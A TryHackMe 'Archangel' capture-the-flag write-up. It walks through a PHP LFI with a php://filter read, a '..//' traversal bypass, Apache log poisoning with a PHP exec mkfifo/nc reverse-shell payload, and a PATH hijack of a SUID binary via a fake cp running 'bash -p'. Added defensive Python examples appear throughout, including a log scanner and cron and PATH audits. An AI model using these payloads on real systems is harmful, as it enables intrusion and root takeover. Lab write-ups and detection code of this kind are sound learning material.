TryHackMe | Archangel Writeup

Anubhav Uniyal
10 min read · Feb 4, 2021

Hey, let’s go, my second write-up. I hope you liked my previous write-up of Madeye’s Castle.

You can find this room here: https://tryhackme.com/room/archangel

Overview

This is an Easy-rated boot2root box, made by TryHackMe user Archangel. This box makes use of virtual domain name hosting. Once you get to the correct domain, you have to exploit the PHP include() function to get an LFI, and then use that LFI to get a reverse shell on the machine. Once in, you need to exploit a cronjob to move horizontally to another user. Finally, you need to spoof the PATH variable to gain root access. Without any further ado, let’s get into it.

Let’s Break In!

Like always, first start with an Nmap scan:

sudo nmap -sS -sV -sC -oA nmap/archangel *THM Box IP* -vv

Here -sS: SYN scan, -sC: run the default (“safe”) scripts, -sV: version enumeration, -oA: output in all formats (grepable, XML and normal Nmap output), -vv: very verbose.

The Nmap scan completed fairly quickly, and we see that two ports are open on this machine: port 80 and port 22, the default ports for HTTP and SSH respectively. Since we don’t have any way to log in over SSH right now, let’s visit the webpage hosted on this machine.

On visiting the machine, we can see that it is filled with a lot of Lorem Ipsum, nothing interesting there. Except, we see a domain-based email on “mafialive.thm” in the website’s contact info. It would appear that this website is using virtual domain name hosting. If you’d like to know more about VDNH you can do so by going here, where I go into more detail on this topic.

Coming back to our machine, add the new domain to our hosts file (IP address<space>domain name), and let’s visit this website. On opening the website, a message appears saying this website is under development, with our very first flag displayed right under it.

Flag has been redacted

Next, we are asked to find a page under development. Now, there are two ways you can go about it:

The very first and clever way (which my dumb-ass totally didn’t think of) is visiting the robots.txt file, and there you have it: “test.php”.

What is robots.txt, you ask? Consider it a gatekeeper for a website. Ever wonder why sensitive data, such as admin webpages, assets and other information that a website stores, never shows up when you search for something? robots.txt is your answer. Whenever a search engine starts crawling a website for information, it first visits robots.txt, which tells the search engine which locations it can and cannot crawl, so that information never shows up on search engines. The only problem with this: robots.txt has to be publicly accessible for the search engine to view it. This means that anyone in the world with a little technical knowledge can also read this file and visit the sup3r-s3cr3t location manually, completely defeating the purpose. This is the reason why different methods like .htaccess were invented, where you can implement user authentication for your secret webpage.
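To make the “publicly readable gatekeeper” point concrete, here is a small robots.txt parser in Python. It is an added example, not part of the write-up or the room; the sample file is constructed to mirror the box (a Disallow entry for /test.php), and the function names are mine. Parsing the file the way a crawler does shows what any reader also gets from it: the full list of paths the site asked crawlers to skip.

```python
# Constructed sample, modelled on the kind of robots.txt the write-up describes:
# a "secret" page is listed so crawlers skip it, which also tells any human reader
# exactly where to look.
SAMPLE_ROBOTS = """\
# robots.txt for mafialive.thm (constructed example)
User-agent: *
Disallow: /test.php
Disallow: /development_testing/

User-agent: Googlebot
Allow: /public/
Disallow: /admin/
"""


def parse_robots(text):
    """Parse robots.txt into groups: {"agents": [...], "rules": [(directive, path), ...]}.

    Directive names are case-insensitive, '#' starts a comment, and a User-agent
    line that follows rules starts a new group (consecutive User-agent lines share one).
    """
    groups, current = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            if current is None or current["rules"]:
                current = {"agents": [], "rules": []}
                groups.append(current)
            current["agents"].append(value.lower())
        elif key in ("allow", "disallow") and current is not None:
            current["rules"].append((key, value))
        # other directives (Sitemap, Crawl-delay, ...) are ignored here
    return groups


def exposed_paths(text):
    """Every path any group asks crawlers to avoid, in file order without duplicates.

    robots.txt is world-readable, so this is exactly the list a person gets by
    reading the file directly; the Disallow keeps it out of search engines only."""
    paths = []
    for group in parse_robots(text):
        for directive, path in group["rules"]:
            if directive == "disallow" and path and path not in paths:
                paths.append(path)
    return paths


def disallowed_for(text, agent="*"):
    """Disallow rules that apply to one crawler name (falling back to the '*' group)."""
    groups = parse_robots(text)
    agent = agent.lower()
    match = [g for g in groups if agent in g["agents"]] or [g for g in groups if "*" in g["agents"]]
    return [path for g in match for directive, path in g["rules"] if directive == "disallow"]


if __name__ == "__main__":
    print("paths a crawler is asked to skip (and anyone can read):", exposed_paths(SAMPLE_ROBOTS))
    print("rules Googlebot would follow:", disallowed_for(SAMPLE_ROBOTS, "Googlebot"))
```

Running exposed_paths() over your own site’s robots.txt is a cheap review step: anything listed there that relies on obscurity rather than authentication is already public.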

The second, and the scrub way of doing it, is by FUZZING the website. Yay, now I don’t have to do any thinking! Just kidding, most of the time you will have to use a fuzzing tool in your workflow; I know I have to in every other box.
I like to use Gobuster for this task; you can use any tool you prefer.

gobuster dir -u http://mafialive.thm/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -x php,txt --threads 50 -o gobuster.out

Here, dir: directory brute-forcing mode, -u: the target URL, -w: the word-list; I use raft-small-directories.txt. It is included in SecLists over at GitHub, which you can clone into your own distro, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word-list from here. -x: the extensions to try. This switch will append .php and .txt to every directory name to check if a file with the same name (also) exists; you can specify multiple file types, separated by a comma. --threads: the number of requests made at a time. Use this switch very cautiously, as in the real world a huge number of requests to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. -o: the output file.

And Gobuster displays the same expected output, “test.php”, so let’s go to this location. On visiting the location we see that this webpage wasn’t supposed to be deployed, which means lax security. *Happy Hacker Noises*.

There is a button present on the webpage; pressing it displays a message “Control is an illusion”. A Mr. Robot reference, nice! And aptly placed too, because we are about to take away control using LFI (Local File Inclusion). Proxying the request through Burp, we capture it and send it to Burp Repeater for further inspection.
After testing for LFI using some basic payloads, nothing turned up. I can’t read any file from outside the given directory; probably a check is in place. We know a “robots.txt” file exists in this directory, so let’s try that. Substituting “robots.txt” for “mrrobot.php”, the content of “robots.txt” was reflected. Success!

The next step was to actually examine test.php, which should also be in the same folder. Replacing “robots.txt” with “test.php”, nothing turned up. Weird. Then I remembered that it was a PHP file, which the server executes rather than rendering as plain text. So, to actually read the contents of the file, I needed to transform it into something the server wouldn’t execute. PHP has an inbuilt stream filter that converts the file’s contents to base64, so using that, the payload then became:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

And we get the output in base64. We can decode it using CyberChef, or anything else really, and read the contents of test.php.

We can see that indeed there was a check in place so that we can’t traverse our path, and that “/var/www/html/development_testing” has to be included. So anything that we can do is restricted to this directory only, or is it!? (*Getting Dem Phoenix Wright Feels*) The thing is that Linux treats “//” as “/”, so even if “../..” is blocked, we can easily bypass it using “..//..”.
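To see why the substring check falls to “..//..” while canonicalisation does not, here is a Python model of both checks. This is an added example, not the room’s test.php (the write-up only describes what that check does, so the naive function is modelled on that description); ALLOWED_DIR is the path from the page, and the function names and the VIEWS allowlist are my own.

```python
import posixpath

# Directory that, per the write-up, every included path "has to" live under.
ALLOWED_DIR = "/var/www/html/development_testing"


def naive_is_allowed(view):
    """Blacklist check modelled on the behaviour the write-up describes (constructed):
    refuse anything containing '../..' and require ALLOWED_DIR to appear somewhere in
    the string. Both halves are string tests, so neither says anything about which file
    actually gets opened: '..//..' does not contain '../..', and a php:// wrapper can
    carry ALLOWED_DIR as a substring while reading whatever it likes."""
    return "../.." not in view and ALLOWED_DIR in view


def hardened_is_allowed(view):
    """Canonicalise first, then compare against the allowed prefix.

    posixpath.normpath collapses repeated slashes and resolves '..' lexically, so
    '..//..' and '../..' become the same path before the check runs. Stream wrappers
    (php://, data:, ...) are not filesystem paths and are rejected outright. In a real
    deployment also resolve symlinks (os.path.realpath) before the prefix comparison."""
    if "://" in view or not view.startswith("/"):
        return False
    canonical = posixpath.normpath(view)
    return canonical == ALLOWED_DIR or canonical.startswith(ALLOWED_DIR + "/")


# Stricter still: never take a path from the client. Map a short, fixed set of view
# names to files the application chose in advance (constructed allowlist).
VIEWS = {
    "mrrobot": posixpath.join(ALLOWED_DIR, "mrrobot.php"),
    "robots": posixpath.join(ALLOWED_DIR, "robots.txt"),
}


def allowlisted_view(name):
    """Return the file for a known view name, or None for anything else."""
    return VIEWS.get(name)


def compare(view):
    """Side-by-side verdict of both checks for one request value."""
    return {"naive": naive_is_allowed(view), "hardened": hardened_is_allowed(view)}


if __name__ == "__main__":
    for value in (
        "/var/www/html/development_testing/mrrobot.php",
        "/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log",
        "php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php",
    ):
        print(compare(value), value)
```

The allowlist variant is the one to prefer: once include() never sees user-controlled text, neither traversal tricks nor wrappers have anything to work on.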

Bypassing the path traversal protection and reading the access.log file, I saw that the User-Agent was being logged. A simple Google search showed me that indeed, this can be turned into RCE (Remote Code Execution) using a simple technique.
First, make a simple request to the domain, replacing the normal User-Agent with:

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *Your machine IP* 4444 >/tmp/f') ?>

Then, open a netcat listener in your terminal:

nc -lvnp 4444

Here -l: listen for an incoming connection, -n: stop netcat from performing DNS resolution, -v: verbose, and -p: the port to listen on.

Then make another request to the website, this time using the LFI to include access.log, which by now has logged the malicious code we passed as the User-Agent, and will execute it.

http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log

And we get a shell back. Awesome, isn’t it?
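From the defender’s side, both halves of this chain leave obvious traces in the very log that gets included: a PHP open tag in the User-Agent field, and a request whose view parameter points at a log file through a “..//” traversal or a php:// wrapper. The following Python scanner is an added example, not part of the write-up; the log lines are constructed in Apache’s combined format (made-up IPs, timestamps and sizes, and a harmless PHP tag in the User-Agent), and the rule names are mine.

```python
import re

# Constructed Apache "combined" log lines. Line 3 carries a PHP open tag in the
# User-Agent (log poisoning); line 4 requests the log file through a '..//' traversal
# that slips past a '../..' blacklist; line 5 uses the php://filter wrapper.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Feb/2021:10:00:01 +0000] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Feb/2021:10:00:07 +0000] "GET /robots.txt HTTP/1.1" 200 40 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Feb/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 1337 "-" "<?php echo 'poison test'; ?>"
10.0.0.9 - - [04/Feb/2021:10:01:30 +0000] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Feb/2021:10:02:02 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# (rule name, record field to inspect, pattern); names are constructed for this example
RULES = [
    ("php-wrapper-in-query", "target", re.compile(r"(?i)php://")),
    ("traversal-in-query", "target", re.compile(r"(?:\.\./|%2e%2e(?:%2f|/))", re.I)),
    ("log-file-requested", "target", re.compile(r"(?i)/var/log/|access\.log|error\.log")),
    ("php-tag-in-user-agent", "ua", re.compile(r"<\?(?:php|=)", re.I)),
]


def parse_line(line):
    """Return the log record as a dict, or None if the line is not combined format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text):
    """One finding per (line, rule) hit: {"line_no", "ip", "rule", "evidence"}."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        for name, field, pattern in RULES:
            if pattern.search(rec[field]):
                findings.append({"line_no": line_no, "ip": rec["ip"],
                                 "rule": name, "evidence": rec[field][:80]})
    return findings


def suspicious_ips(text, threshold=2):
    """Client IPs that triggered at least `threshold` distinct rules."""
    by_ip = {}
    for f in scan_log(text):
        by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return sorted(ip for ip, rules in by_ip.items() if len(rules) >= threshold)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line_no']} {f['ip']} {f['rule']}: {f['evidence']}")
    print("correlated:", suspicious_ips(SAMPLE_LOG))
```

The traversal pattern matches “../” on its own, which is why “..//” is caught: the detection looks for the primitive, not for the exact string the application happened to blacklist. Correlating rules per client, as suspicious_ips() does, separates a poisoned User-Agent followed by a log include from a lone scanner probe.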

Now this is a very basic shell, with no tab auto-completion, and Ctrl-C doesn’t stop the current process: press Ctrl-C in this shell and it will kill the connection. It has happened to me, and man, was getting the connection back a bitch. ANYWAY, let’s upgrade the shell before proceeding.

python3 -c 'import pty; pty.spawn("/bin/bash")'

This will give you a slightly better shell, but without those magical features. To get a fully functioning TTY shell:

Press Ctrl-Z to background the current shell, then on your terminal type:
stty raw -echo; fg <enter><enter>

Then on your shell:

stty rows 16 columns 136
export TERM=xterm-256color
reset

(If you skip the export TERM step, you won’t be able to open a text editor.)

And you’ll feel right at home…. or maybe not.

Getting the user flag was easy: just go to the archangel directory and cat the user.txt file.
Now, on to escalating our privileges. There was a folder named myfiles, in which there was a file called password backup; when I printed the file it had a link to a YouTube video. If you have done any amount of CTFs, you very well know where this is leading: a “Rick Astley — Never Gonna Give You Up” video. I swear to god, if I see this video one more time... See man, no offense, but this meme has been going on for too long, and at this point it is just painful to watch. Moving on. There was another folder by the name secret, but I didn’t have the permission to open it.

I tried running sudo -l, but since I didn’t know the password for www-data, this wasn’t an option. Next, I looked for a binary with the SUID bit set; no luck there either. Next, I looked for some cronjobs that might be running, but nothing was.
After exhausting all my options, I tried looking for any interesting files user archangel may own, using the find command:

find / -user archangel -type f 2>/dev/null | grep -v /proc

Here, /: the directory from where to begin searching (root in this case), -user: only show files owned by a particular user, -type: what kind of entry to find (f for regular files), 2>/dev/null: this option is a little complex in its entirety, so just understand this: it hides any errors produced during the execution of the command. |: pipes the output of the left command as input to the right command. grep: searches for a particular pattern in a given input, -v: hides lines matching the specified pattern.

And finally, we find something interesting: a bash script owned by the user. If we can modify the file we can maybe see what’s inside the secret folder. We did have permission to write to the script, but when I tried cd’ing into the secret directory, permission was denied, and no matter what I did, I couldn’t see the contents of the folder. So, I tried getting a reverse shell on my machine, changing the file into a Python script and using the reverse shell from swisskyrepo.

I executed the file and got a reverse shell as... www-data. That’s a lot of work just to fail, isn’t it? Just for the sake of it, I tried running it as the user archangel with sudo -u archangel ./helloworld, because there wasn’t anything else to do really. First it asked for www-data’s credentials; thinking it was the wrong way to go about it, I pressed Ctrl-C to exit, and I got a reverse shell back... as archangel?

I was surprised, to say the least. I don’t think this was the intended route; I’ll update the article when I find out about it. Until then, let’s move on.

Update: Okay, it looks like I just ignored the crontab output; apparently there was a cronjob running every minute, executing helloworld.sh as the user archangel. That was the reason why I got the reverse shell back. If you’re wondering what a cronjob is, let me explain briefly. Basically, Cron is a time-based job scheduler which is preinstalled in every Unix-based distribution. Using Cron, you can schedule menial tasks which you would like to be executed at certain times or intervals, and you can also specify which user the job will run as, archangel in the case above. These repeating tasks that Cron performs are called cronjobs, and can be viewed in the file /etc/crontab.
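A quick way to catch the misconfiguration the update describes, a cron job that runs a script writable by other users under a different account, is to audit /etc/crontab entries against the permissions of the scripts they point to. The Python below is an added example, not from the room: it creates two scripts in a temporary directory (one mode 777 as in the box, one 755), lists them in a constructed crontab, and reports the writable one. The interpreter list and the finding wording are mine.

```python
import os
import stat
import tempfile

# If a cron command starts with one of these, the script being run is the next word.
INTERPRETERS = {"sh", "bash", "dash", "python", "python2", "python3", "perl", "php"}


def script_from_command(command):
    """Best-effort: the file a cron command will execute."""
    words = command.split()
    if not words:
        return None
    if os.path.basename(words[0]) in INTERPRETERS and len(words) > 1:
        return words[1]
    return words[0]


def parse_system_crontab(lines):
    """Yield (user, command) from /etc/crontab-style lines (5 time fields + user),
    skipping comments, blank lines and VAR=value assignments; '@reboot'-style
    shortcuts take a single schedule field."""
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            _, user, command = parts
        else:
            parts = line.split(None, 6)
            if len(parts) < 7:
                continue
            user, command = parts[5], parts[6]
        yield user, command


def audit_crontab(lines):
    """Flag jobs whose script (or its directory) can be modified by someone other
    than the owner: group- or world-writable script, or world-writable directory
    without the sticky bit (so the script can be swapped out)."""
    findings = []
    for user, command in parse_system_crontab(lines):
        path = script_from_command(command)
        if not path or not os.path.isabs(path) or not os.path.exists(path):
            findings.append({"user": user, "path": path, "issue": "missing or relative script path"})
            continue
        mode = os.stat(path).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append({"user": user, "path": path, "issue": "script writable by group/other"})
        dmode = os.stat(os.path.dirname(path)).st_mode
        if dmode & stat.S_IWOTH and not dmode & stat.S_ISVTX:
            findings.append({"user": user, "path": path, "issue": "directory world-writable, script can be replaced"})
    return findings


def demo():
    """Build two scripts in a temp dir and audit a constructed crontab that runs them."""
    d = tempfile.mkdtemp()
    safe = os.path.join(d, "backup.sh")
    loose = os.path.join(d, "helloworld.sh")   # name mirrors the write-up; content is constructed
    for p in (safe, loose):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho hello\n")
    os.chmod(safe, 0o755)
    os.chmod(loose, 0o777)   # the mistake the write-up exploits: anyone can edit it
    os.chmod(d, 0o755)
    crontab = [
        "SHELL=/bin/sh",
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin",
        "# m h dom mon dow user command",
        f"*/1 * * * * archangel {loose}",
        f"0 3 * * * root {safe} --quiet",
        f"@reboot root /bin/bash {safe}",
    ]
    return audit_crontab(crontab)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['user']}: {f['path']} -> {f['issue']}")
```

The same check belongs on per-user crontabs (/var/spool/cron) and on /etc/cron.d, and the remediation is the obvious one: the script a job runs should be owned by root or the job’s user and writable by nobody else.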

After getting the privilege escalation, I cd’ed into the secret directory and got the second flag. Also, I understood the real way to do it, as it was very clearly mentioned in the flag. Eh, what’s done is done, amirite. No, no, worry not, I’ll update the article when I do it the right way.

In the secret folder, apart from the flag, there was also a binary executable file with the SUID bit set. I exported the file to my computer for further inspection.
Opening the file in Ghidra and decompiling the main function, the binary was calling cp through system(), and the binary was running as root. This would mean that if I can somehow make it pick up my own cp instead of the system cp binary, I can get root access.

To do that, first create a file called cp in the secret folder (or any folder, just remember to set the PATH variable accordingly). Inside the cp file, set the payload to:

#!/bin/bash
bash -p

And give it executable permission (chmod +x cp, just in case you were wondering). This will give you root access when executed. Next, set the PATH variable using:

export PATH=$PWD:$PATH

I did this so that the system will first look for the cp file in this directory, instead of going to the system-defined cp binary.
I executed the binary, got root access and solved the box.
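What makes the PATH trick work is that system() hands a bare command name to /bin/sh, which searches PATH left to right, so whichever directory comes first wins; an absolute path such as /bin/cp ignores PATH entirely. The Python below is an added example, not the room’s binary: it recreates the situation in a temporary directory (a fake cp that only echoes a marker, and a PATH with that directory prepended) and reports, for each command a privileged program might run, which file would actually execute and whether its directory is under someone else’s control. The function names and the “clean” PATH value are mine.

```python
import os
import shutil
import stat
import tempfile


def resolve_command(name, path_env):
    """Which file runs when a program calls system("<name> ...")?

    A name containing '/' is used as given; a bare name is searched left to right
    through path_env, which is what /bin/sh does."""
    if "/" in name:
        return name if os.access(name, os.X_OK) else None
    return shutil.which(name, path=path_env)


def dir_is_tamperable(directory):
    """True if users other than the owner can create or replace files here."""
    try:
        mode = os.stat(directory).st_mode
    except FileNotFoundError:
        return True  # a missing PATH entry can be created by whoever controls the parent
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH)) and not mode & stat.S_ISVTX


def hijack_risks(commands, path_env):
    """For each command a privileged program runs via system(), report the file that
    would execute and whether a relative name lands in a directory others can write."""
    report = []
    for cmd in commands:
        resolved = resolve_command(cmd, path_env)
        relative = "/" not in cmd
        risky = relative and (resolved is None or dir_is_tamperable(os.path.dirname(resolved)))
        report.append({"command": cmd, "resolves_to": resolved, "relative": relative, "risky": risky})
    return report


def demo():
    """Recreate the write-up's setup: a user-controlled directory prepended to PATH
    holding an executable named 'cp' (constructed; it only prints a marker)."""
    d = tempfile.mkdtemp()
    fake_cp = os.path.join(d, "cp")
    with open(fake_cp, "w") as fh:
        fh.write("#!/bin/sh\necho 'placeholder cp from user directory'\n")
    os.chmod(fake_cp, 0o755)
    os.chmod(d, 0o777)  # writable by everyone, like a shared scratch directory
    poisoned = f"{d}:/usr/bin:/bin"  # what `export PATH=$PWD:$PATH` produces in that directory
    clean = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"  # assumed system default
    return {
        "relative_poisoned": hijack_risks(["cp"], poisoned)[0],
        "relative_clean": hijack_risks(["cp"], clean)[0],
        "absolute_poisoned": hijack_risks(["/bin/cp"], poisoned)[0],
    }


if __name__ == "__main__":
    for label, entry in demo().items():
        print(f"{label}: {entry['command']} -> {entry['resolves_to']} (risky={entry['risky']})")
```

A SUID program cannot trust the caller’s environment at all, so “clean PATH” is only the hopeful case; the durable fixes are to call cp by absolute path, or to reset PATH to a known value before system() (better still, use execve() with an absolute path and a fixed environment).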

If you have any suggestions, do let me know in the comments.
Have a nice day.

Anubhav Uniyal

DevOps Engineer. Cyber Security Enthusiast. Always up to solve a mystery. All views are my own